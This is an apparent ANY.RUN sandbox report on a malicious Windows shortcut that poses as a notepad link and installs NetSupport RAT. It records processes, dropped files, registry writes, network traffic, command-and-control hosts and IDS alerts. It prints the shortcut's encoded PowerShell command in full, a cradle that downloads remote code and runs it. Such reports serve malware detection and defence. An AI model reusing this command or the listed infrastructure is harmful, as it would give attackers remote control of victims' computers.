| File name: | 70b2c4a5ae788ed8b336168433216179685abbe15ae67075c3fedd9543e5edc9.lnk |
| Full analysis: | https://app.any.run/tasks/a8aabbdf-f640-4759-b7d0-cdf7aaf15c58 |
| Verdict: | Malicious activity |
| Threats: | NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software. |
| Analysis date: | March 14, 2024, 16:21:39 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
| MD5: | 20CC6087C66B064EF405E80CFCEBC1F9 |
| SHA1: | 2BAAAB44A71080E2D927AA60CA9E693500E680E1 |
| SHA256: | 70B2C4A5AE788ED8B336168433216179685ABBE15AE67075C3FEDD9543E5EDC9 |
| SSDEEP: | 1536:Zy8JwIve4Gg5xcXQlNYDkKPNuLCFm7PAQ:QedvFGg5xpYDkKPNu207R |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | powershell.exe |
| Description: | pq2yH9YNjgnz8lAhVsOIPFfbaTRZ54xGCEuUdrBX01WoLK6veD7mw3ikcSQ MJt |
| RelativePath: | ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| CommandLineArguments: | -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AbgBlAHMALgBjAG8AcwBtAG8AcABlAG8AcABsAGUALgBpAG4ALwAxAHoAaAB5AC4AdAB4AHQAJwApACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= |
| IconFileName: | C:\Windows\System32\notepad.exe |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3804 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4248 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5032 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AbgBlAHMALgBjAG8AcwBtAG8AcABlAG8AcABsAGUALgBpAG4ALwAxAHoAaAB5AC4AdAB4AHQAJwApACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6328 | "C:\Users\admin\AppData\Local\AppReadiness\client32.exe" | C:\Users\admin\AppData\Local\AppReadiness\client32.exe | powershell.exe | ||||||||||||
User: admin Company: NetSupport Ltd Integrity Level: MEDIUM Description: NetSupport Client Application Exit code: 0 Version: V12.70 Modules
| |||||||||||||||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (5032) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fa2c1150b0de11a9.customDestinations-ms | binary | |
MD5:3D8D9CEDA88EDE346C63B39C0FB8ED40 | SHA256:5268EAC10692780399A6E5F6BEDA9EFC70A9BFE1AA87C4FA400A68910CC24315 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\F3ipuPF.zip | compressed | |
MD5:C352F6091CC21325F9FB39BD31659CAB | SHA256:B30574BAE6A7B307B51851FA0483A18209C198093D1B91FA1BD9F3907B347739 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\AppReadiness\Acx01000.sys | executable | |
MD5:9DA9B9D0EBF1F2CE320EC8D42DD0480B | SHA256:9945D826CC61104B2F71259A47E2941B232F003BB727DCD0E543626AD7993FCC | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4rg5bkph.mp5.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\AppReadiness\client32.exe | executable | |
MD5:A2B46C59F6E7E395D479B09464ECDBA0 | SHA256:89F0C8F170FE9EA28B1056517160E92E2D7D4E8AA81F4ED696932230413A6CE1 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\AppReadiness\client32.ini | text | |
MD5:2AB1A1A4BBB4CE9FEB537A9B0483F8DA | SHA256:C0720F41ABAF9103A4B226DF7D54B1D187CBDC275C68D51DE6E9CA98859B200F | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\AppReadiness\msvcr100.dll | executable | |
MD5:0E37FBFA79D349D672456923EC5FBBE3 | SHA256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\AppReadiness\AudioCapture.dll | executable | |
MD5:4182F37B9BA1FA315268C669B5335DDE | SHA256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l1l3ebar.mvs.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7UEJZB7O1RTY9G9UHHG.temp | binary | |
MD5:3D8D9CEDA88EDE346C63B39C0FB8ED40 | SHA256:5268EAC10692780399A6E5F6BEDA9EFC70A9BFE1AA87C4FA400A68910CC24315 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2836 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
5032 | powershell.exe | GET | 200 | 46.105.141.54:80 | http://rahnoturkey.com/nyhjkszpcccggjukfgnattexybnfgziizyh.txt | unknown | text | 3.26 Mb | unknown |
2836 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
2836 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
6328 | client32.exe | GET | 200 | 104.26.1.231:80 | http://geo.netsupportsoftware.com/location/loca.asp | unknown | text | 17 b | unknown |
6328 | client32.exe | POST | 200 | 192.236.192.48:443 | http://192.236.192.48/fakeurl.htm | unknown | binary | 61 b | unknown |
6328 | client32.exe | POST | 200 | 192.236.192.48:443 | http://192.236.192.48/fakeurl.htm | unknown | binary | 159 b | unknown |
6328 | client32.exe | POST | — | 192.236.192.48:443 | http://192.236.192.48/fakeurl.htm | unknown | — | — | unknown |
6328 | client32.exe | POST | — | 192.236.192.48:443 | http://192.236.192.48/fakeurl.htm | unknown | — | — | unknown |
4184 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4828 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
1280 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2836 | svchost.exe | 40.126.31.69:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5032 | powershell.exe | 66.85.138.70:443 | nes.cosmopeople.in | SSASN2 | US | unknown |
5032 | powershell.exe | 46.105.141.54:80 | rahnoturkey.com | OVH SAS | FR | unknown |
2836 | svchost.exe | 20.190.159.23:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2836 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
6328 | client32.exe | 104.26.1.231:80 | geo.netsupportsoftware.com | CLOUDFLARENET | US | unknown |
6328 | client32.exe | 192.236.192.48:443 | parabmasale.com | HOSTWINDS | US | unknown |
6908 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
Domain | IP | Reputation |
|---|---|---|
nes.cosmopeople.in |
| unknown |
rahnoturkey.com |
| unknown |
ocsp.digicert.com |
| whitelisted |
geo.netsupportsoftware.com |
| unknown |
parabmasale.com |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
arc.msn.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
5032 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
6328 | client32.exe | Potential Corporate Privacy Violation | ET POLICY NetSupport GeoLocation Lookup Request |
6328 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
6328 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
6328 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
6328 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
6328 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
6328 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
6328 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
6328 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |